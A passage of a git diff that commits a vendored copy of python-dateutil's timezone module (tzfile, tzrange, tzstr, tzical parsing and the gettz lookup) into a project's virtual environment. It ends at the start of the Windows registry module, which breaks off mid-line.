datetime.timedelta(seconds=gmtoff) + tti.isdst = isdst + tti.abbr = abbr[abbrind:abbr.find('\x00', abbrind)] + tti.isstd = (ttisstdcnt > i and isstd[i] != 0) + tti.isgmt = (ttisgmtcnt > i and isgmt[i] != 0) + out.ttinfo_list.append(tti) + + # Replace ttinfo indexes for ttinfo objects. + out.trans_idx = [out.ttinfo_list[idx] for idx in out.trans_idx] + + # Set standard, dst, and before ttinfos. before will be + # used when a given time is before any transitions, + # and will be set to the first non-dst ttinfo, or to + # the first dst, if all of them are dst. + out.ttinfo_std = None + out.ttinfo_dst = None + out.ttinfo_before = None + if out.ttinfo_list: + if not out.trans_list_utc: + out.ttinfo_std = out.ttinfo_first = out.ttinfo_list[0] + else: + for i in range(timecnt-1, -1, -1): + tti = out.trans_idx[i] + if not out.ttinfo_std and not tti.isdst: + out.ttinfo_std = tti + elif not out.ttinfo_dst and tti.isdst: + out.ttinfo_dst = tti + + if out.ttinfo_std and out.ttinfo_dst: + break + else: + if out.ttinfo_dst and not out.ttinfo_std: + out.ttinfo_std = out.ttinfo_dst + + for tti in out.ttinfo_list: + if not tti.isdst: + out.ttinfo_before = tti + break + else: + out.ttinfo_before = out.ttinfo_list[0] + + # Now fix transition times to become relative to wall time. + # + # I'm not sure about this. In my tests, the tz source file + # is setup to wall time, and in the binary file isstd and + # isgmt are off, so it should be in wall time. OTOH, it's + # always in gmt time. Let me know if you have comments + # about this. + lastdst = None + lastoffset = None + lastdstoffset = None + lastbaseoffset = None + out.trans_list = [] + + for i, tti in enumerate(out.trans_idx): + offset = tti.offset + dstoffset = 0 + + if lastdst is not None: + if tti.isdst: + if not lastdst: + dstoffset = offset - lastoffset + + if not dstoffset and lastdstoffset: + dstoffset = lastdstoffset + + tti.dstoffset = datetime.timedelta(seconds=dstoffset) + lastdstoffset = dstoffset + + # If a time zone changes its base offset during a DST transition, + # then you need to adjust by the previous base offset to get the + # transition time in local time. Otherwise you use the current + # base offset. Ideally, I would have some mathematical proof of + # why this is true, but I haven't really thought about it enough. + baseoffset = offset - dstoffset + adjustment = baseoffset + if (lastbaseoffset is not None and baseoffset != lastbaseoffset + and tti.isdst != lastdst): + # The base DST has changed + adjustment = lastbaseoffset + + lastdst = tti.isdst + lastoffset = offset + lastbaseoffset = baseoffset + + out.trans_list.append(out.trans_list_utc[i] + adjustment) + + out.trans_idx = tuple(out.trans_idx) + out.trans_list = tuple(out.trans_list) + out.trans_list_utc = tuple(out.trans_list_utc) + + return out + + def _find_last_transition(self, dt, in_utc=False): + # If there's no list, there are no transitions to find + if not self._trans_list: + return None + + timestamp = _datetime_to_timestamp(dt) + + # Find where the timestamp fits in the transition list - if the + # timestamp is a transition time, it's part of the "after" period. + trans_list = self._trans_list_utc if in_utc else self._trans_list + idx = bisect.bisect_right(trans_list, timestamp) + + # We want to know when the previous transition was, so subtract off 1 + return idx - 1 + + def _get_ttinfo(self, idx): + # For no list or after the last transition, default to _ttinfo_std + if idx is None or (idx + 1) >= len(self._trans_list): + return self._ttinfo_std + + # If there is a list and the time is before it, return _ttinfo_before + if idx < 0: + return self._ttinfo_before + + return self._trans_idx[idx] + + def _find_ttinfo(self, dt): + idx = self._resolve_ambiguous_time(dt) + + return self._get_ttinfo(idx) + + def fromutc(self, dt): + """ + The ``tzfile`` implementation of :py:func:`datetime.tzinfo.fromutc`. + + :param dt: + A :py:class:`datetime.datetime` object. + + :raises TypeError: + Raised if ``dt`` is not a :py:class:`datetime.datetime` object. + + :raises ValueError: + Raised if this is called with a ``dt`` which does not have this + ``tzinfo`` attached. + + :return: + Returns a :py:class:`datetime.datetime` object representing the + wall time in ``self``'s time zone. + """ + # These isinstance checks are in datetime.tzinfo, so we'll preserve + # them, even if we don't care about duck typing. + if not isinstance(dt, datetime.datetime): + raise TypeError("fromutc() requires a datetime argument") + + if dt.tzinfo is not self: + raise ValueError("dt.tzinfo is not self") + + # First treat UTC as wall time and get the transition we're in. + idx = self._find_last_transition(dt, in_utc=True) + tti = self._get_ttinfo(idx) + + dt_out = dt + datetime.timedelta(seconds=tti.offset) + + fold = self.is_ambiguous(dt_out, idx=idx) + + return enfold(dt_out, fold=int(fold)) + + def is_ambiguous(self, dt, idx=None): + """ + Whether or not the "wall time" of a given datetime is ambiguous in this + zone. + + :param dt: + A :py:class:`datetime.datetime`, naive or time zone aware. + + + :return: + Returns ``True`` if ambiguous, ``False`` otherwise. + + .. versionadded:: 2.6.0 + """ + if idx is None: + idx = self._find_last_transition(dt) + + # Calculate the difference in offsets from current to previous + timestamp = _datetime_to_timestamp(dt) + tti = self._get_ttinfo(idx) + + if idx is None or idx <= 0: + return False + + od = self._get_ttinfo(idx - 1).offset - tti.offset + tt = self._trans_list[idx] # Transition time + + return timestamp < tt + od + + def _resolve_ambiguous_time(self, dt): + idx = self._find_last_transition(dt) + + # If we have no transitions, return the index + _fold = self._fold(dt) + if idx is None or idx == 0: + return idx + + # If it's ambiguous and we're in a fold, shift to a different index. + idx_offset = int(not _fold and self.is_ambiguous(dt, idx)) + + return idx - idx_offset + + def utcoffset(self, dt): + if dt is None: + return None + + if not self._ttinfo_std: + return ZERO + + return self._find_ttinfo(dt).delta + + def dst(self, dt): + if dt is None: + return None + + if not self._ttinfo_dst: + return ZERO + + tti = self._find_ttinfo(dt) + + if not tti.isdst: + return ZERO + + # The documentation says that utcoffset()-dst() must + # be constant for every dt. + return tti.dstoffset + + @tzname_in_python2 + def tzname(self, dt): + if not self._ttinfo_std or dt is None: + return None + return self._find_ttinfo(dt).abbr + + def __eq__(self, other): + if not isinstance(other, tzfile): + return NotImplemented + return (self._trans_list == other._trans_list and + self._trans_idx == other._trans_idx and + self._ttinfo_list == other._ttinfo_list) + + __hash__ = None + + def __ne__(self, other): + return not (self == other) + + def __repr__(self): + return "%s(%s)" % (self.__class__.__name__, repr(self._filename)) + + def __reduce__(self): + return self.__reduce_ex__(None) + + def __reduce_ex__(self, protocol): + return (self.__class__, (None, self._filename), self.__dict__) + + +class tzrange(tzrangebase): + """ + The ``tzrange`` object is a time zone specified by a set of offsets and + abbreviations, equivalent to the way the ``TZ`` variable can be specified + in POSIX-like systems, but using Python delta objects to specify DST + start, end and offsets. + + :param stdabbr: + The abbreviation for standard time (e.g. ``'EST'``). + + :param stdoffset: + An integer or :class:`datetime.timedelta` object or equivalent + specifying the base offset from UTC. + + If unspecified, +00:00 is used. + + :param dstabbr: + The abbreviation for DST / "Summer" time (e.g. ``'EDT'``). + + If specified, with no other DST information, DST is assumed to occur + and the default behavior or ``dstoffset``, ``start`` and ``end`` is + used. If unspecified and no other DST information is specified, it + is assumed that this zone has no DST. + + If this is unspecified and other DST information is *is* specified, + DST occurs in the zone but the time zone abbreviation is left + unchanged. + + :param dstoffset: + A an integer or :class:`datetime.timedelta` object or equivalent + specifying the UTC offset during DST. If unspecified and any other DST + information is specified, it is assumed to be the STD offset +1 hour. + + :param start: + A :class:`relativedelta.relativedelta` object or equivalent specifying + the time and time of year that daylight savings time starts. To + specify, for example, that DST starts at 2AM on the 2nd Sunday in + March, pass: + + ``relativedelta(hours=2, month=3, day=1, weekday=SU(+2))`` + + If unspecified and any other DST information is specified, the default + value is 2 AM on the first Sunday in April. + + :param end: + A :class:`relativedelta.relativedelta` object or equivalent + representing the time and time of year that daylight savings time + ends, with the same specification method as in ``start``. One note is + that this should point to the first time in the *standard* zone, so if + a transition occurs at 2AM in the DST zone and the clocks are set back + 1 hour to 1AM, set the ``hours`` parameter to +1. + + + **Examples:** + + .. testsetup:: tzrange + + from dateutil.tz import tzrange, tzstr + + .. doctest:: tzrange + + >>> tzstr('EST5EDT') == tzrange("EST", -18000, "EDT") + True + + >>> from dateutil.relativedelta import * + >>> range1 = tzrange("EST", -18000, "EDT") + >>> range2 = tzrange("EST", -18000, "EDT", -14400, + ... relativedelta(hours=+2, month=4, day=1, + ... weekday=SU(+1)), + ... relativedelta(hours=+1, month=10, day=31, + ... weekday=SU(-1))) + >>> tzstr('EST5EDT') == range1 == range2 + True + + """ + def __init__(self, stdabbr, stdoffset=None, + dstabbr=None, dstoffset=None, + start=None, end=None): + + global relativedelta + from dateutil import relativedelta + + self._std_abbr = stdabbr + self._dst_abbr = dstabbr + + try: + stdoffset = stdoffset.total_seconds() + except (TypeError, AttributeError): + pass + + try: + dstoffset = dstoffset.total_seconds() + except (TypeError, AttributeError): + pass + + if stdoffset is not None: + self._std_offset = datetime.timedelta(seconds=stdoffset) + else: + self._std_offset = ZERO + + if dstoffset is not None: + self._dst_offset = datetime.timedelta(seconds=dstoffset) + elif dstabbr and stdoffset is not None: + self._dst_offset = self._std_offset + datetime.timedelta(hours=+1) + else: + self._dst_offset = ZERO + + if dstabbr and start is None: + self._start_delta = relativedelta.relativedelta( + hours=+2, month=4, day=1, weekday=relativedelta.SU(+1)) + else: + self._start_delta = start + + if dstabbr and end is None: + self._end_delta = relativedelta.relativedelta( + hours=+1, month=10, day=31, weekday=relativedelta.SU(-1)) + else: + self._end_delta = end + + self._dst_base_offset_ = self._dst_offset - self._std_offset + self.hasdst = bool(self._start_delta) + + def transitions(self, year): + """ + For a given year, get the DST on and off transition times, expressed + always on the standard time side. For zones with no transitions, this + function returns ``None``. + + :param year: + The year whose transitions you would like to query. + + :return: + Returns a :class:`tuple` of :class:`datetime.datetime` objects, + ``(dston, dstoff)`` for zones with an annual DST transition, or + ``None`` for fixed offset zones. + """ + if not self.hasdst: + return None + + base_year = datetime.datetime(year, 1, 1) + + start = base_year + self._start_delta + end = base_year + self._end_delta + + return (start, end) + + def __eq__(self, other): + if not isinstance(other, tzrange): + return NotImplemented + + return (self._std_abbr == other._std_abbr and + self._dst_abbr == other._dst_abbr and + self._std_offset == other._std_offset and + self._dst_offset == other._dst_offset and + self._start_delta == other._start_delta and + self._end_delta == other._end_delta) + + @property + def _dst_base_offset(self): + return self._dst_base_offset_ + + +@six.add_metaclass(_TzStrFactory) +class tzstr(tzrange): + """ + ``tzstr`` objects are time zone objects specified by a time-zone string as + it would be passed to a ``TZ`` variable on POSIX-style systems (see + the `GNU C Library: TZ Variable`_ for more details). + + There is one notable exception, which is that POSIX-style time zones use an + inverted offset format, so normally ``GMT+3`` would be parsed as an offset + 3 hours *behind* GMT. The ``tzstr`` time zone object will parse this as an + offset 3 hours *ahead* of GMT. If you would like to maintain the POSIX + behavior, pass a ``True`` value to ``posix_offset``. + + The :class:`tzrange` object provides the same functionality, but is + specified using :class:`relativedelta.relativedelta` objects. rather than + strings. + + :param s: + A time zone string in ``TZ`` variable format. This can be a + :class:`bytes` (2.x: :class:`str`), :class:`str` (2.x: + :class:`unicode`) or a stream emitting unicode characters + (e.g. :class:`StringIO`). + + :param posix_offset: + Optional. If set to ``True``, interpret strings such as ``GMT+3`` or + ``UTC+3`` as being 3 hours *behind* UTC rather than ahead, per the + POSIX standard. + + .. caution:: + + Prior to version 2.7.0, this function also supported time zones + in the format: + + * ``EST5EDT,4,0,6,7200,10,0,26,7200,3600`` + * ``EST5EDT,4,1,0,7200,10,-1,0,7200,3600`` + + This format is non-standard and has been deprecated; this function + will raise a :class:`DeprecatedTZFormatWarning` until + support is removed in a future version. + + .. _`GNU C Library: TZ Variable`: + https://www.gnu.org/software/libc/manual/html_node/TZ-Variable.html + """ + def __init__(self, s, posix_offset=False): + global parser + from dateutil.parser import _parser as parser + + self._s = s + + res = parser._parsetz(s) + if res is None or res.any_unused_tokens: + raise ValueError("unknown string format") + + # Here we break the compatibility with the TZ variable handling. + # GMT-3 actually *means* the timezone -3. + if res.stdabbr in ("GMT", "UTC") and not posix_offset: + res.stdoffset *= -1 + + # We must initialize it first, since _delta() needs + # _std_offset and _dst_offset set. Use False in start/end + # to avoid building it two times. + tzrange.__init__(self, res.stdabbr, res.stdoffset, + res.dstabbr, res.dstoffset, + start=False, end=False) + + if not res.dstabbr: + self._start_delta = None + self._end_delta = None + else: + self._start_delta = self._delta(res.start) + if self._start_delta: + self._end_delta = self._delta(res.end, isend=1) + + self.hasdst = bool(self._start_delta) + + def _delta(self, x, isend=0): + from dateutil import relativedelta + kwargs = {} + if x.month is not None: + kwargs["month"] = x.month + if x.weekday is not None: + kwargs["weekday"] = relativedelta.weekday(x.weekday, x.week) + if x.week > 0: + kwargs["day"] = 1 + else: + kwargs["day"] = 31 + elif x.day: + kwargs["day"] = x.day + elif x.yday is not None: + kwargs["yearday"] = x.yday + elif x.jyday is not None: + kwargs["nlyearday"] = x.jyday + if not kwargs: + # Default is to start on first sunday of april, and end + # on last sunday of october. + if not isend: + kwargs["month"] = 4 + kwargs["day"] = 1 + kwargs["weekday"] = relativedelta.SU(+1) + else: + kwargs["month"] = 10 + kwargs["day"] = 31 + kwargs["weekday"] = relativedelta.SU(-1) + if x.time is not None: + kwargs["seconds"] = x.time + else: + # Default is 2AM. + kwargs["seconds"] = 7200 + if isend: + # Convert to standard time, to follow the documented way + # of working with the extra hour. See the documentation + # of the tzinfo class. + delta = self._dst_offset - self._std_offset + kwargs["seconds"] -= delta.seconds + delta.days * 86400 + return relativedelta.relativedelta(**kwargs) + + def __repr__(self): + return "%s(%s)" % (self.__class__.__name__, repr(self._s)) + + +class _tzicalvtzcomp(object): + def __init__(self, tzoffsetfrom, tzoffsetto, isdst, + tzname=None, rrule=None): + self.tzoffsetfrom = datetime.timedelta(seconds=tzoffsetfrom) + self.tzoffsetto = datetime.timedelta(seconds=tzoffsetto) + self.tzoffsetdiff = self.tzoffsetto - self.tzoffsetfrom + self.isdst = isdst + self.tzname = tzname + self.rrule = rrule + + +class _tzicalvtz(_tzinfo): + def __init__(self, tzid, comps=[]): + super(_tzicalvtz, self).__init__() + + self._tzid = tzid + self._comps = comps + self._cachedate = [] + self._cachecomp = [] + self._cache_lock = _thread.allocate_lock() + + def _find_comp(self, dt): + if len(self._comps) == 1: + return self._comps[0] + + dt = dt.replace(tzinfo=None) + + try: + with self._cache_lock: + return self._cachecomp[self._cachedate.index( + (dt, self._fold(dt)))] + except ValueError: + pass + + lastcompdt = None + lastcomp = None + + for comp in self._comps: + compdt = self._find_compdt(comp, dt) + + if compdt and (not lastcompdt or lastcompdt < compdt): + lastcompdt = compdt + lastcomp = comp + + if not lastcomp: + # RFC says nothing about what to do when a given + # time is before the first onset date. We'll look for the + # first standard component, or the first component, if + # none is found. + for comp in self._comps: + if not comp.isdst: + lastcomp = comp + break + else: + lastcomp = comp[0] + + with self._cache_lock: + self._cachedate.insert(0, (dt, self._fold(dt))) + self._cachecomp.insert(0, lastcomp) + + if len(self._cachedate) > 10: + self._cachedate.pop() + self._cachecomp.pop() + + return lastcomp + + def _find_compdt(self, comp, dt): + if comp.tzoffsetdiff < ZERO and self._fold(dt): + dt -= comp.tzoffsetdiff + + compdt = comp.rrule.before(dt, inc=True) + + return compdt + + def utcoffset(self, dt): + if dt is None: + return None + + return self._find_comp(dt).tzoffsetto + + def dst(self, dt): + comp = self._find_comp(dt) + if comp.isdst: + return comp.tzoffsetdiff + else: + return ZERO + + @tzname_in_python2 + def tzname(self, dt): + return self._find_comp(dt).tzname + + def __repr__(self): + return "" % repr(self._tzid) + + __reduce__ = object.__reduce__ + + +class tzical(object): + """ + This object is designed to parse an iCalendar-style ``VTIMEZONE`` structure + as set out in `RFC 5545`_ Section 4.6.5 into one or more `tzinfo` objects. + + :param `fileobj`: + A file or stream in iCalendar format, which should be UTF-8 encoded + with CRLF endings. + + .. _`RFC 5545`: https://tools.ietf.org/html/rfc5545 + """ + def __init__(self, fileobj): + global rrule + from dateutil import rrule + + if isinstance(fileobj, string_types): + self._s = fileobj + # ical should be encoded in UTF-8 with CRLF + fileobj = open(fileobj, 'r') + else: + self._s = getattr(fileobj, 'name', repr(fileobj)) + fileobj = _nullcontext(fileobj) + + self._vtz = {} + + with fileobj as fobj: + self._parse_rfc(fobj.read()) + + def keys(self): + """ + Retrieves the available time zones as a list. + """ + return list(self._vtz.keys()) + + def get(self, tzid=None): + """ + Retrieve a :py:class:`datetime.tzinfo` object by its ``tzid``. + + :param tzid: + If there is exactly one time zone available, omitting ``tzid`` + or passing :py:const:`None` value returns it. Otherwise a valid + key (which can be retrieved from :func:`keys`) is required. + + :raises ValueError: + Raised if ``tzid`` is not specified but there are either more + or fewer than 1 zone defined. + + :returns: + Returns either a :py:class:`datetime.tzinfo` object representing + the relevant time zone or :py:const:`None` if the ``tzid`` was + not found. + """ + if tzid is None: + if len(self._vtz) == 0: + raise ValueError("no timezones defined") + elif len(self._vtz) > 1: + raise ValueError("more than one timezone available") + tzid = next(iter(self._vtz)) + + return self._vtz.get(tzid) + + def _parse_offset(self, s): + s = s.strip() + if not s: + raise ValueError("empty offset") + if s[0] in ('+', '-'): + signal = (-1, +1)[s[0] == '+'] + s = s[1:] + else: + signal = +1 + if len(s) == 4: + return (int(s[:2]) * 3600 + int(s[2:]) * 60) * signal + elif len(s) == 6: + return (int(s[:2]) * 3600 + int(s[2:4]) * 60 + int(s[4:])) * signal + else: + raise ValueError("invalid offset: " + s) + + def _parse_rfc(self, s): + lines = s.splitlines() + if not lines: + raise ValueError("empty string") + + # Unfold + i = 0 + while i < len(lines): + line = lines[i].rstrip() + if not line: + del lines[i] + elif i > 0 and line[0] == " ": + lines[i-1] += line[1:] + del lines[i] + else: + i += 1 + + tzid = None + comps = [] + invtz = False + comptype = None + for line in lines: + if not line: + continue + name, value = line.split(':', 1) + parms = name.split(';') + if not parms: + raise ValueError("empty property name") + name = parms[0].upper() + parms = parms[1:] + if invtz: + if name == "BEGIN": + if value in ("STANDARD", "DAYLIGHT"): + # Process component + pass + else: + raise ValueError("unknown component: "+value) + comptype = value + founddtstart = False + tzoffsetfrom = None + tzoffsetto = None + rrulelines = [] + tzname = None + elif name == "END": + if value == "VTIMEZONE": + if comptype: + raise ValueError("component not closed: "+comptype) + if not tzid: + raise ValueError("mandatory TZID not found") + if not comps: + raise ValueError( + "at least one component is needed") + # Process vtimezone + self._vtz[tzid] = _tzicalvtz(tzid, comps) + invtz = False + elif value == comptype: + if not founddtstart: + raise ValueError("mandatory DTSTART not found") + if tzoffsetfrom is None: + raise ValueError( + "mandatory TZOFFSETFROM not found") + if tzoffsetto is None: + raise ValueError( + "mandatory TZOFFSETFROM not found") + # Process component + rr = None + if rrulelines: + rr = rrule.rrulestr("\n".join(rrulelines), + compatible=True, + ignoretz=True, + cache=True) + comp = _tzicalvtzcomp(tzoffsetfrom, tzoffsetto, + (comptype == "DAYLIGHT"), + tzname, rr) + comps.append(comp) + comptype = None + else: + raise ValueError("invalid component end: "+value) + elif comptype: + if name == "DTSTART": + # DTSTART in VTIMEZONE takes a subset of valid RRULE + # values under RFC 5545. + for parm in parms: + if parm != 'VALUE=DATE-TIME': + msg = ('Unsupported DTSTART param in ' + + 'VTIMEZONE: ' + parm) + raise ValueError(msg) + rrulelines.append(line) + founddtstart = True + elif name in ("RRULE", "RDATE", "EXRULE", "EXDATE"): + rrulelines.append(line) + elif name == "TZOFFSETFROM": + if parms: + raise ValueError( + "unsupported %s parm: %s " % (name, parms[0])) + tzoffsetfrom = self._parse_offset(value) + elif name == "TZOFFSETTO": + if parms: + raise ValueError( + "unsupported TZOFFSETTO parm: "+parms[0]) + tzoffsetto = self._parse_offset(value) + elif name == "TZNAME": + if parms: + raise ValueError( + "unsupported TZNAME parm: "+parms[0]) + tzname = value + elif name == "COMMENT": + pass + else: + raise ValueError("unsupported property: "+name) + else: + if name == "TZID": + if parms: + raise ValueError( + "unsupported TZID parm: "+parms[0]) + tzid = value + elif name in ("TZURL", "LAST-MODIFIED", "COMMENT"): + pass + else: + raise ValueError("unsupported property: "+name) + elif name == "BEGIN" and value == "VTIMEZONE": + tzid = None + comps = [] + invtz = True + + def __repr__(self): + return "%s(%s)" % (self.__class__.__name__, repr(self._s)) + + +if sys.platform != "win32": + TZFILES = ["/etc/localtime", "localtime"] + TZPATHS = ["/usr/share/zoneinfo", + "/usr/lib/zoneinfo", + "/usr/share/lib/zoneinfo", + "/etc/zoneinfo"] +else: + TZFILES = [] + TZPATHS = [] + + +def __get_gettz(): + tzlocal_classes = (tzlocal,) + if tzwinlocal is not None: + tzlocal_classes += (tzwinlocal,) + + class GettzFunc(object): + """ + Retrieve a time zone object from a string representation + + This function is intended to retrieve the :py:class:`tzinfo` subclass + that best represents the time zone that would be used if a POSIX + `TZ variable`_ were set to the same value. + + If no argument or an empty string is passed to ``gettz``, local time + is returned: + + .. code-block:: python3 + + >>> gettz() + tzfile('/etc/localtime') + + This function is also the preferred way to map IANA tz database keys + to :class:`tzfile` objects: + + .. code-block:: python3 + + >>> gettz('Pacific/Kiritimati') + tzfile('/usr/share/zoneinfo/Pacific/Kiritimati') + + On Windows, the standard is extended to include the Windows-specific + zone names provided by the operating system: + + .. code-block:: python3 + + >>> gettz('Egypt Standard Time') + tzwin('Egypt Standard Time') + + Passing a GNU ``TZ`` style string time zone specification returns a + :class:`tzstr` object: + + .. code-block:: python3 + + >>> gettz('AEST-10AEDT-11,M10.1.0/2,M4.1.0/3') + tzstr('AEST-10AEDT-11,M10.1.0/2,M4.1.0/3') + + :param name: + A time zone name (IANA, or, on Windows, Windows keys), location of + a ``tzfile(5)`` zoneinfo file or ``TZ`` variable style time zone + specifier. An empty string, no argument or ``None`` is interpreted + as local time. + + :return: + Returns an instance of one of ``dateutil``'s :py:class:`tzinfo` + subclasses. + + .. versionchanged:: 2.7.0 + + After version 2.7.0, any two calls to ``gettz`` using the same + input strings will return the same object: + + .. code-block:: python3 + + >>> tz.gettz('America/Chicago') is tz.gettz('America/Chicago') + True + + In addition to improving performance, this ensures that + `"same zone" semantics`_ are used for datetimes in the same zone. + + + .. _`TZ variable`: + https://www.gnu.org/software/libc/manual/html_node/TZ-Variable.html + + .. _`"same zone" semantics`: + https://blog.ganssle.io/articles/2018/02/aware-datetime-arithmetic.html + """ + def __init__(self): + + self.__instances = weakref.WeakValueDictionary() + self.__strong_cache_size = 8 + self.__strong_cache = OrderedDict() + self._cache_lock = _thread.allocate_lock() + + def __call__(self, name=None): + with self._cache_lock: + rv = self.__instances.get(name, None) + + if rv is None: + rv = self.nocache(name=name) + if not (name is None + or isinstance(rv, tzlocal_classes) + or rv is None): + # tzlocal is slightly more complicated than the other + # time zone providers because it depends on environment + # at construction time, so don't cache that. + # + # We also cannot store weak references to None, so we + # will also not store that. + self.__instances[name] = rv + else: + # No need for strong caching, return immediately + return rv + + self.__strong_cache[name] = self.__strong_cache.pop(name, rv) + + if len(self.__strong_cache) > self.__strong_cache_size: + self.__strong_cache.popitem(last=False) + + return rv + + def set_cache_size(self, size): + with self._cache_lock: + self.__strong_cache_size = size + while len(self.__strong_cache) > size: + self.__strong_cache.popitem(last=False) + + def cache_clear(self): + with self._cache_lock: + self.__instances = weakref.WeakValueDictionary() + self.__strong_cache.clear() + + @staticmethod + def nocache(name=None): + """A non-cached version of gettz""" + tz = None + if not name: + try: + name = os.environ["TZ"] + except KeyError: + pass + if name is None or name in ("", ":"): + for filepath in TZFILES: + if not os.path.isabs(filepath): + filename = filepath + for path in TZPATHS: + filepath = os.path.join(path, filename) + if os.path.isfile(filepath): + break + else: + continue + if os.path.isfile(filepath): + try: + tz = tzfile(filepath) + break + except (IOError, OSError, ValueError): + pass + else: + tz = tzlocal() + else: + try: + if name.startswith(":"): + name = name[1:] + except TypeError as e: + if isinstance(name, bytes): + new_msg = "gettz argument should be str, not bytes" + six.raise_from(TypeError(new_msg), e) + else: + raise + if os.path.isabs(name): + if os.path.isfile(name): + tz = tzfile(name) + else: + tz = None + else: + for path in TZPATHS: + filepath = os.path.join(path, name) + if not os.path.isfile(filepath): + filepath = filepath.replace(' ', '_') + if not os.path.isfile(filepath): + continue + try: + tz = tzfile(filepath) + break + except (IOError, OSError, ValueError): + pass + else: + tz = None + if tzwin is not None: + try: + tz = tzwin(name) + except (WindowsError, UnicodeEncodeError): + # UnicodeEncodeError is for Python 2.7 compat + tz = None + + if not tz: + from dateutil.zoneinfo import get_zonefile_instance + tz = get_zonefile_instance().get(name) + + if not tz: + for c in name: + # name is not a tzstr unless it has at least + # one offset. For short values of "name", an + # explicit for loop seems to be the fastest way + # To determine if a string contains a digit + if c in "0123456789": + try: + tz = tzstr(name) + except ValueError: + pass + break + else: + if name in ("GMT", "UTC"): + tz = UTC + elif name in time.tzname: + tz = tzlocal() + return tz + + return GettzFunc() + + +gettz = __get_gettz() +del __get_gettz + + +def datetime_exists(dt, tz=None): + """ + Given a datetime and a time zone, determine whether or not a given datetime + would fall in a gap. + + :param dt: + A :class:`datetime.datetime` (whose time zone will be ignored if ``tz`` + is provided.) + + :param tz: + A :class:`datetime.tzinfo` with support for the ``fold`` attribute. If + ``None`` or not provided, the datetime's own time zone will be used. + + :return: + Returns a boolean value whether or not the "wall time" exists in + ``tz``. + + .. versionadded:: 2.7.0 + """ + if tz is None: + if dt.tzinfo is None: + raise ValueError('Datetime is naive and no time zone provided.') + tz = dt.tzinfo + + dt = dt.replace(tzinfo=None) + + # This is essentially a test of whether or not the datetime can survive + # a round trip to UTC. + dt_rt = dt.replace(tzinfo=tz).astimezone(UTC).astimezone(tz) + dt_rt = dt_rt.replace(tzinfo=None) + + return dt == dt_rt + + +def datetime_ambiguous(dt, tz=None): + """ + Given a datetime and a time zone, determine whether or not a given datetime + is ambiguous (i.e if there are two times differentiated only by their DST + status). + + :param dt: + A :class:`datetime.datetime` (whose time zone will be ignored if ``tz`` + is provided.) + + :param tz: + A :class:`datetime.tzinfo` with support for the ``fold`` attribute. If + ``None`` or not provided, the datetime's own time zone will be used. + + :return: + Returns a boolean value whether or not the "wall time" is ambiguous in + ``tz``. + + .. versionadded:: 2.6.0 + """ + if tz is None: + if dt.tzinfo is None: + raise ValueError('Datetime is naive and no time zone provided.') + + tz = dt.tzinfo + + # If a time zone defines its own "is_ambiguous" function, we'll use that. + is_ambiguous_fn = getattr(tz, 'is_ambiguous', None) + if is_ambiguous_fn is not None: + try: + return tz.is_ambiguous(dt) + except Exception: + pass + + # If it doesn't come out and tell us it's ambiguous, we'll just check if + # the fold attribute has any effect on this particular date and time. + dt = dt.replace(tzinfo=tz) + wall_0 = enfold(dt, fold=0) + wall_1 = enfold(dt, fold=1) + + same_offset = wall_0.utcoffset() == wall_1.utcoffset() + same_dst = wall_0.dst() == wall_1.dst() + + return not (same_offset and same_dst) + + +def resolve_imaginary(dt): + """ + Given a datetime that may be imaginary, return an existing datetime. + + This function assumes that an imaginary datetime represents what the + wall time would be in a zone had the offset transition not occurred, so + it will always fall forward by the transition's change in offset. + + .. doctest:: + + >>> from dateutil import tz + >>> from datetime import datetime + >>> NYC = tz.gettz('America/New_York') + >>> print(tz.resolve_imaginary(datetime(2017, 3, 12, 2, 30, tzinfo=NYC))) + 2017-03-12 03:30:00-04:00 + + >>> KIR = tz.gettz('Pacific/Kiritimati') + >>> print(tz.resolve_imaginary(datetime(1995, 1, 1, 12, 30, tzinfo=KIR))) + 1995-01-02 12:30:00+14:00 + + As a note, :func:`datetime.astimezone` is guaranteed to produce a valid, + existing datetime, so a round-trip to and from UTC is sufficient to get + an extant datetime, however, this generally "falls back" to an earlier time + rather than falling forward to the STD side (though no guarantees are made + about this behavior). + + :param dt: + A :class:`datetime.datetime` which may or may not exist. + + :return: + Returns an existing :class:`datetime.datetime`. If ``dt`` was not + imaginary, the datetime returned is guaranteed to be the same object + passed to the function. + + .. versionadded:: 2.7.0 + """ + if dt.tzinfo is not None and not datetime_exists(dt): + + curr_offset = (dt + datetime.timedelta(hours=24)).utcoffset() + old_offset = (dt - datetime.timedelta(hours=24)).utcoffset() + + dt += curr_offset - old_offset + + return dt + + +def _datetime_to_timestamp(dt): + """ + Convert a :class:`datetime.datetime` object to an epoch timestamp in + seconds since January 1, 1970, ignoring the time zone. + """ + return (dt.replace(tzinfo=None) - EPOCH).total_seconds() + + +if sys.version_info >= (3, 6): + def _get_supported_offset(second_offset): + return second_offset +else: + def _get_supported_offset(second_offset): + # For python pre-3.6, round to full-minutes if that's not the case. + # Python's datetime doesn't accept sub-minute timezones. Check + # http://python.org/sf/1447945 or https://bugs.python.org/issue5288 + # for some information. + old_offset = second_offset + calculated_offset = 60 * ((second_offset + 30) // 60) + return calculated_offset + + +try: + # Python 3.7 feature + from contextlib import nullcontext as _nullcontext +except ImportError: + class _nullcontext(object): + """ + Class for wrapping contexts so that they are passed through in a + with statement. + """ + def __init__(self, context): + self.context = context + + def __enter__(self): + return self.context + + def __exit__(*args, **kwargs): + pass + +# vim:ts=4:sw=4:et diff --git a/env/Lib/site-packages/dateutil/tz/win.py b/env/Lib/site-packages/dateutil/tz/win.py new file mode 100644 index 00000000..cde07ba7 --- /dev/null +++ b/env/Lib/site-packages/dateutil/tz/win.py @@ -0,0 +1,370 @@ +# -*- coding: utf-8 -*- +""" +This module provides an interface to the native time zone data on Windows, +including :py:class:`datetime.tzinfo` implementations. + +Attempting to import this module on a non-Windows platform will raise an +:py:obj:`ImportError`. +""" +# This code was originally contributed by Jeffrey Harris. +import datetime +import struct + +from six.moves import winreg +from six import text_type + +try: + import ctypes + from ctypes import wintypes +except ValueError: + # ValueError is raised on non-Windows systems for some horrible reason. + raise ImportError("Running tzwin on non-Windows system") + +from ._common import tzrangebase + +__all__ = ["tzwin", "tzwinlocal", "tzres"] + +ONEWEEK = datetime.timedelta(7) + +TZKEYNAMENT = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones" +TZKEYNAME9X = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Time Zones" +TZLOCALKEYNAME = r"SYSTEM\CurrentControlSet\Control\TimeZoneInformation" + + +def _settzkeyname(): + handle = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) + try: + winreg.OpenKey(handle, 